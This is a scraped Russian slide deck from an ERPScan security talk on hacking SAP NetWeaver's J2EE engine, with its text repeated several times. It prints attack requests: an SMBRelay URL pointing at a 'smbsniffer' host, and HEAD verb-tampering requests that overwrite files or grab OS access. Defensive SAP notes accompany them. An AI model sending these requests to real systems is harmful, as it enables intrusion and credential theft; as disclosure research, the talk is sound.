Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
